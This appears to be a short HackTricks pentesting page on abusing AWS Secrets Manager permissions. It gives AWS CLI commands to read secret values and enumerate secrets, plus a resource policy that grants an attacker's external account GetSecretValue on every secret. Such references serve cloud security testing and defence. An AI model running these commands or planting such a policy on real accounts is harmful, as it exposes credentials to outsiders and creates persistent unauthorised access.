{{#include ../../../../banners/hacktricks-training.md}}
For more info about secrets manager check:
{{#ref}} ../../aws-services/aws-secrets-manager-enum.md {{#endref}}
An attacker with this permission can get the saved value inside a secret in AWS Secretsmanager.
aws secretsmanager get-secret-value --secret-id <secret_name> # Get valuePotential Impact: Access high sensitive data inside AWS secrets manager service.
Warning
Note that even with the secretsmanager:BatchGetSecretValue permission an atatcker would also need secretsmanager:GetSecretValue to retrieve the sensitive secrets.
With the previous permissions it's possible to give access to other principals/accounts (even external) to access the secret. Note that in order to read secrets encrypted with a KMS key, the user also needs to have access over the KMS key (more info in the KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.jsonpolicy.json:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}{{#include ../../../../banners/hacktricks-training.md}}